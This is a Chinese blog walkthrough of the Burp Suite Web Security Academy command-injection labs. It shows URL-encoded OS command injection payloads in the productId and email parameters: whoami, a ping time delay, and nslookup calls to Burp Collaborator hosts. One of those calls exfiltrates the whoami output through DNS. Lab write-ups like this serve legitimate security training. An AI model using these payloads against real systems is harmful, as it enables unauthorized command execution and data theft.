burpsuite官方靶场之命令注入

2024-07-03 253 0

1.简单的命令注入

1.1 达成目标

成功执行whoami查看当前用户的名字。

1.2 攻击步骤

观察该靶场的页面,发现这是一个展示其商品信息的页面,点击view details可以展示每个商品的详情。

burpsuite官方靶场之命令注入插图

来到一个商品的详情页,发现画框部分是检查商品库存的功能。

burpsuite官方靶场之命令注入插图1

对此进行抓包,发现传递了productId和storeId参数。

burpsuite官方靶场之命令注入插图2

对productId插入其payload

# payload

%26whoami%26

%26是对&的url编码,因为在http数据包中,&符号用来分隔不同的参数,如果直接使用&那么,会被http数据包当成分割符,因此需要进行url编码,当进行数据传递之后,对此进行解码,使其&生效。

在系统命令中,&符号用来拼接其命令,让拼接的几个命令分别运行。

burpsuite官方靶场之命令注入插图3

burpsuite官方靶场之命令注入插图4

2.利用时间延迟的命令盲注

2.1 达成目标

利用命令盲注导致10秒的延迟。

2.2 攻击步骤

来到Submit feedback页面,这是一个给网站提交反馈的页面。因为要向起管理员提交用户反馈,因此很可能使用了sendmail命令。使用该命令向管理员邮箱发送反馈用户的名字,邮箱以及反馈信息等。也正因为是往管理员发送邮件,因此可能网站本身不会有回显。

burpsuite官方靶场之命令注入插图5

抓取提交反馈的数据包,往email插入payload

# payload

%26ping -c10127.0.0.1%26

burpsuite官方靶场之命令注入插图6

burpsuite官方靶场之命令注入插图7

3.利用输出重定向的命令盲注

3.1 达成目标

该靶场存在一个可写的文件夹:/var/www/images

执行whoami命令,将其结果重定向输出到这个文件夹下面,然后检索其内容

3.2 攻击步骤

还是来到提交反馈的页面。

burpsuite官方靶场之命令注入插图8

在提交反馈的时候进行抓包,然后在email输入其payload。

burpsuite官方靶场之命令注入插图9

在靶场的主界面观察其数据包,发现了一个image的路径用来加载其图片,该路径传递filename参数。

burpsuite官方靶场之命令注入插图10

burpsuite官方靶场之命令注入插图11

burpsuite官方靶场之命令注入插图12

4.利用带外通道技术进行命令盲注

4.1 达成目标

利用命令盲注对burpsuite的collaborator发起DNS查询。

4.2 攻击步骤

还是一样的页面,开干。

burpsuite官方靶场之命令注入插图13

对该页面提交任意的测试数据,然后点击Submit feedback,对此进行抓包。

burpsuite官方靶场之命令注入插图14

来到burpsuite的collaborator,激活此功能。

该功能用来充当一个dns查询的服务器,可以把一些在渗透测试中不能直接通过其响应数据探测到的漏洞,通过out-of-band技术,在这里也就是利用collaborator这个集成在burpsutie软件里面的功能,使得通过其响应看不到的漏洞,通过这种方式显形。这个功能就类似于dnslog。

burpsuite官方靶场之命令注入插图15

还是一样的,盯死email参数,往该参数插入payload。

burpsuite官方靶场之命令注入插图16

# payload

%26nslookup%200no5vo9uebzjpzworih5vhzzyq4hs7gw.oastify.com%26

burpsuite官方靶场之命令注入插图17

burpsuite官方靶场之命令注入插图18

burpsuite官方靶场之命令注入插图19

burpsuite官方靶场之命令注入插图20

5.利用带外通道技术获取系统用户名

5.1 达成目标

利用带外通道技术获取系统用户名。

5.2 攻击步骤

是的,没错,还是一样的页面。

burpsuite官方靶场之命令注入插图21

随意提交一些测试数据,然后提交其反馈进行抓包。

burpsuite官方靶场之命令注入插图22

一样的,盯死email参数,插入Payload。

# payload

%26nslookup%20`whoami`.wrr1zkdqi73ftv0kvel1zd3v2m8dw4kt.oastify.com%26

在该payload中,``符号也就是键盘的左上角(反引号),该符号应用在系统的shell中那么符号里面的字符是会被当成命令执行的

burpsuite官方靶场之命令注入插图23

burpsuite官方靶场之命令注入插图24

现在,在该下图的按钮中提交我们所获取的用户名。

burpsuite官方靶场之命令注入插图25

burpsuite官方靶场之命令注入插图26


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

电力企业 | 安全建设框架
HTB-Infiltrator:一文带你走进域渗透
JAVA安全 | Classloader:理解与利用一篇就够了
多角度揭秘威胁行为组织CryptoCore复杂的加密货币欺诈活动
网络空间的“边水往事”?针对华语黑产及用户进行攻击的 APT-K-UN3 活动分析
伪装“黑神话悟空修改器”传播木马的活动分析

发布评论